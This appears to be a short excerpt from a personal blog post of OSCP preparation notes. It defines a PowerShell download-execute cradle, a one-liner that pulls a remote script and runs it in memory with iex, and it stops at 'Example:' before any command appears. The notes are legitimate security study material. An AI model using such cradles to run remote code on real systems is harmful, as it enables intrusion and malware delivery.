yashfren/yashfren.github.io/_posts/2025-07-21-Week1OSCPPrep.md

 - Download-Execute Cradles

-a.
 A Download-Execute Cradle is a one-liner that downloads a remote PowerShell script and executes it directly in memory using `iex`

 Example: